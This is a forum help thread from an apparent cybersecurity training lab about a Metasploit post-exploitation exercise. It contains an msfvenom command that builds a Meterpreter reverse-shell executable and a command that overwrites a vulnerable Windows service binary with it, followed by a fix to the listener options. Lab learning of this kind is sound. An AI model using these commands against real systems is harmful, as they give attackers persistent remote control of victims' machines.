Forum Discussion

Bronze I

23 days ago

Solved

Ep 7 Post Exploitation With Metasploit

I’m having issues with q9 and don’t know why what I’m currently doing isn’t working. I’ve ran SharpUp.exe and found a vulnerable binary location (C:/Windows/Important-Service/Important-Service.exe)....

help & support

offensive cyber

autom8on
10 days ago
Erm, shouldn't those be LHOST/LPORT?

pwn6394

Bronze I

15 days ago

Evening. Yes, I've overwritten the existing binary using a new .exe I created (below). I used a basic shell rather than Meterpreter to copy it across once on the box (using Meterpreter upload) and got confirmation of the overwrite (below). Still not getting a reverse shell back on my second listener. I've manually tried to start the service; but that fails to get the session. Is there anything else that I'm missing? I have confirmed that the architecture is x64, so my payload should work. Do you have to run the execute_dotnet_assembly module again, or other Meterpreter modules? Thank you. It will be something really silly that I have overlooked.

msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=5555 RHOSTS=10.102.***.*** -f exe -o Important-Service.exe

copy /v Important-Service.exe C:\Windows\Important-Service

autom8on

Silver I

10 days ago

Erm, shouldn't those be LHOST/LPORT?

pwn6394
Bronze I
9 days ago
Thank you. This was the mistake!

Forum Discussion

Ep 7 Post Exploitation With Metasploit

Featured Places

Help & Support Forum

Related Content

Pen Test CTFs: Jinja2 Exploitation

Cross-Site Scripting: Ep.6 – Further Exploitation

Human Connection Challenge: Season 1 – Web Exploitation - XSS

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Introduction to Metasploit: Ep.9 – Demonstrate Your Skills

Recent Discussions

Elastic Data Ingest: Ep.2 – Filebeat

Web server brute force authentication: Ep. 1 - Compromising an account

Google Cloud Basics: Ep.7 – Demonstrate Your Skills - Task 10

Credential Access: Using Hydra

Active Directory Basics: Demonstrate Your Skills